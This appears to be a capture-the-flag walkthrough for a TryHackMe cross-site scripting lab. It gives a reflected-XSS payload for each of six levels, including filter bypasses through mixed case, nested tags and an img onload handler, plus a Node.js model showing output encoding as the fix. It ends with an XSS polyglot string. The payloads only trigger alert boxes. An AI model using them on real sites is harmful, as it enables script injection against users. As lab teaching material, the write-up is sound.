Perfecting our Payload

Level One

  • If we enter the name Adam and view the page source, we'll see Adam reflected directly in the HTML, as plain text between tags

  • Instead of a name, we enter our payload, which the page then reflects as a real script tag

<script>alert('THM');</script>

Level Two

  • Viewing the page source, we can see our name reflected inside the value attribute of the input tag

  • If we try our usual payload, it won't work: the browser treats everything inside the value attribute as text, so a script tag placed there is never parsed as a tag. We first need to close the attribute and the input tag, and only then add our script payload

"><script>alert('THM');</script>

The " closes the value attribute and the > closes the input tag, so the script tag that follows is parsed as a normal element rather than as attribute text

Level Three

  • We'll have to escape the textarea tag a little differently from the input one: the browser treats everything up to the closing textarea tag as text, so we have to close the textarea itself before our script tag

  • So the payload would look something like

</textarea><script>alert('THM');</script>

Level Four - Tricky One!

  • Entering our name into the form, we'll see it reflected on the page

  • This level looks similar to level one, but upon inspecting the page source, we'll see our name gets reflected in some JavaScript code

  • We'll have to escape from the existing JavaScript statement, which holds our name inside a single-quoted string literal

  • The ' closes the string literal holding our name

  • The ; ends the current statement, so what follows is a new statement

  • The // at the end turns the rest of the original line (the closing ' and ; the page already places after our input) into a comment, so the script still parses as valid JavaScript instead of failing with a syntax error

';alert('THM');//

Level Five

  • This level looks the same as level one, and our name also gets reflected in the same place

  • But if we try the <script>alert('THM');</script> payload, it won't work

  • We can see that it's filtering out the word script. The tag name is HTML, not JavaScript (JavaScript itself is case-sensitive, but HTML tag names are not), so if the filter only matches the exact lowercase word, a mixed-case tag slips past it and the browser still treats it as a script tag

<ScRiPt>alert('THM');</sCrIpT>

  • If the filter removes the word only once rather than repeatedly, we can also nest it so that stripping one copy of script leaves a valid tag behind (sscriptcript minus script is script)

<sscriptcript>alert('THM');</sscriptcript>

Level Six

  • Similar to level two, where we had to escape from the input tag, here our name is reflected inside the src attribute of an img tag

  • We can see that the < and > characters get filtered out of our payload, so we can't close the img tag and open a new one

  • To bypass this, we stay inside the img tag and take advantage of its other attributes, such as the onload event handler

The onload event runs the JavaScript of our choosing once the image given in the src attribute has loaded, so the src value must point at an image that actually exists

  • Let's now modify our payload to something like the following, where our first " closes the src attribute and the quote the page already places after our input closes the onload value

/images/cat.png" onload="alert('THM');
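As an added example (not code from the TryHackMe room or from this writeup), the following Node.js script models the reflection context of each of the six levels above with stand-in templates of my own, applies the level's filter where the writeup describes one, and checks whether each payload lands somewhere a browser would execute it. It also shows the context-aware output encoding that would have stopped every one of them. The template strings, the filter implementations (a single, case-sensitive removal of the word script for level five; stripping of < and > for level six), the tiny tokenizer and the function names are all assumptions for illustration.

```javascript
// Added example, not the TryHackMe room's code. The templates, filters and
// helper names below are assumptions that model what the writeup describes.
// Runs under Node.js with no dependencies.

// The payloads from the walkthrough, one per level.
const payloads = {
  one:   "<script>alert('THM');</script>",
  two:   "\"><script>alert('THM');</script>",
  three: "</textarea><script>alert('THM');</script>",
  four:  "';alert('THM');//",
  five:  "<sscriptcript>alert('THM');</sscriptcript>",
  six:   "/images/cat.png\" onload=\"alert('THM');",
};

// Stand-in server side for each level: where the name lands and what the
// filter strips. Level five removes the literal lowercase word "script" once
// per occurrence (not repeatedly); level six removes < and >.
const vulnerable = {
  one:   (n) => `<p>Hello, ${n}</p>`,
  two:   (n) => `<input type="text" name="name" value="${n}">`,
  three: (n) => `<textarea name="name">${n}</textarea>`,
  four:  (n) => `<script>var name = '${n}';</script>`,
  five:  (n) => `<p>Hello, ${n.replace(/script/g, '')}</p>`,
  six:   (n) => `<img src="${n.replace(/[<>]/g, '')}">`,
};

// Minimal HTML tokenizer: tells apart text, the inside of a tag, a
// double-quoted attribute value, and the raw-text body of <script> and
// <textarea>. It collects script bodies and on* handler attributes, which
// are the only places the payloads above can run. Not a full parser.
function findExecutable(html) {
  const hits = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== '<') { i++; continue; }                       // plain text
    const tag = /^<(\/?)([a-zA-Z][a-zA-Z0-9]*)/.exec(html.slice(i));
    if (!tag) { i++; continue; }                                  // a stray "<"
    const closing = tag[1] === '/', name = tag[2].toLowerCase();
    i += tag[0].length;
    while (i < html.length && html[i] !== '>') {                  // attributes
      const a = /^\s*([^\s=>"']+)\s*=\s*"([^"]*)"/.exec(html.slice(i));
      if (!a) { i++; continue; }
      if (/^on[a-z]+$/i.test(a[1])) hits.push({ where: `${name} ${a[1]}`, code: a[2] });
      i += a[0].length;
    }
    i++;                                                          // past ">"
    if (!closing && (name === 'script' || name === 'textarea')) { // raw text body
      let end = html.toLowerCase().indexOf(`</${name}`, i);
      if (end === -1) end = html.length;
      if (name === 'script') hits.push({ where: 'script body', code: html.slice(i, end) });
      i = end;
    }
  }
  return hits;
}

// True if some executable position holds our marker and the code there is
// syntactically valid JavaScript. new Function() only compiles the body and
// never calls it, so alert() is not invoked while checking.
function executes(html) {
  return findExecutable(html).some((h) => {
    if (!h.code.includes("alert('THM')")) return false;
    try { new Function(h.code); return true; } catch (e) { return false; }
  });
}

// Context-aware output encoding, the fix for all six levels: numeric entities
// for HTML text and attribute values, \uXXXX escapes inside a JS string literal.
const encodeHtml = (s) => s.replace(/[&<>"']/g, (c) => `&#${c.charCodeAt(0)};`);
const encodeJs = (s) => s.replace(/[^A-Za-z0-9]/g,
  (c) => `\\u${c.charCodeAt(0).toString(16).padStart(4, '0')}`);

const hardened = {
  one:   (n) => `<p>Hello, ${encodeHtml(n)}</p>`,
  two:   (n) => `<input type="text" name="name" value="${encodeHtml(n)}">`,
  three: (n) => `<textarea name="name">${encodeHtml(n)}</textarea>`,
  four:  (n) => `<script>var name = '${encodeJs(n)}';</script>`,
  five:  (n) => `<p>Hello, ${encodeHtml(n)}</p>`,
  six:   (n) => `<img src="${encodeHtml(n)}">`,
};

// Does `value` reach an executable position on `level` of the given app?
function breaksOut(level, value, app = vulnerable) {
  return executes(app[level](value));
}

for (const level of Object.keys(payloads)) {
  console.log(level.padEnd(5),
    'vulnerable:', breaksOut(level, payloads[level]),
    'hardened:', breaksOut(level, payloads[level], hardened));
}
```

Two things the model makes visible that the payloads alone do not: breaksOut('four', "';alert('THM')") is false because the leftover ' and ; make the script a syntax error, which is exactly what the trailing // prevents, and breaksOut('five', "<script>alert('THM');</script>") is false while the mixed-case and nested variants are true, because the stand-in filter strips the lowercase word once and never re-checks its output. The hardened templates stop every payload without any filtering at all, by encoding for the context the value is written into.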

XSS Polyglot

  • An XSS polyglot is a single string that can escape attributes and tags and bypass filters all at once, so the same payload can be tried in several different reflection contexts without tailoring it to each one

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
